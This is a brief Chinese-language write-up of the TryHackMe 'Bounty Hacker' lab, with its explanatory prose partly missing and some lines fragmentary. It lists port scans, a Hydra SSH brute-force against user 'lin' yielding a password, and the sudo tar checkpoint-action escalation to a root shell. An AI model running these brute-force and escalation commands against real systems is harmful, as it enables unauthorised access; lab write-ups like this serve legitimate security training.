今天來打 Try Hack Me 上面的,Bounty Hacker 題目,主要使用了爆破 ssh 密碼,以及 tar 的提權利用方式。
rustscan -a 10.10.164.54 -r 1-65535
nmap -A -p21,22,80 10.10.164.54
lin
lin
的帳號,對密碼使用 Hydra 進行暴力破解。
hydra -l 'lin' -P locks.txt ssh://10.10.164.54
lin
RedDr4gonSynd1cat3
sudo -l
sudo tar
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh